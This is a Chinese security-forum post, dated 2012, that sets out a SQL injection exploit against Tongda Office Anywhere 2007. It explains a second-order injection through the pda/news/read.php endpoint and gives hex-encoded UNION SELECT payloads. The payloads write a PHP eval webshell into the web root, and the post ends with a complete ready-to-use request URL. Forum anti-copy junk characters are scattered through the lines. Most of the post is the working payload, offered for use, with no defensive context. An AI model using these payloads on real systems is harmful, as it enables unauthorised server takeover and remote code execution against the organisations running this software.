找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2500|回复: 0
打印 上一主题 下一主题

通达OA2007版本漏洞及getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-20 08:09:24 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
目前测试通达OA2007版本8 \5 L, |' U/ a. _4 o
) g, [# S5 y$ e0 p1 E
2 S4 `: T- s) _0 x/ O+ d4 r" }
Office Anywhere 2007 网络智能办公系统5 Z9 J2 H5 E* C% x, V

2 h- H, E4 \8 K# ~" r; b. uhttp://127.0.0.1/pda/news/read.php?P=%cf'    猪点。   暴web目录..! f" m+ G+ A. n. ?
$ O- L/ `" A" [+ g2 H' V6 w

8 d& X3 k: K9 j/ {# M9 O4 l这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的: w" S; e. D1 d1 i

$ O1 _3 d6 n9 {8 ]# {. [例如:SELECT * from USER where USER_ID='{$USERNAME}'  
  H3 R, W: ]: a' `* G  B; S+ S其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了
5 j4 X/ C1 r; o0 V 8 O$ `( ?1 K, J( S) p% G( F
这个时候我们是不是可以组合起来使用哪?2 O: B3 H* l3 c  V- o7 ~
& p" Z) j4 S' G  s8 i. M
第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样( P: u% P/ V. g2 W% [1 f$ A
union select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,10
" K2 s; S  R+ K* y 4 d; z. {2 x! w( d$ v
这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了
& m& H6 ?; C% m% M( e 6 X4 X- |4 ~8 Z! H+ r
那么问题来了,单引号可以吗?当然是不可以的,^_^。。。
* l. I1 B, i1 `! v# _0 ` # Z+ @! i0 b' @; ~
那么我们用字符串格式带入进行hex编码
3 G- F* C& ^; G2 S+ `$ `1 W 0 U2 C. x  p" f+ T7 m8 a8 k2 t# q, l
%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
8 e! Y+ P. P) |+ D
+ j+ ]9 k6 g9 ~# g+ t测试ok,获取oa的webshell
0 s# v8 p+ g1 e - ~$ C* O  ^3 I% M3 P& a
. |* x7 J% t: u& }
pda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23- T, ~$ Q8 x1 E1 l$ t9 A
直接getwebshell
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表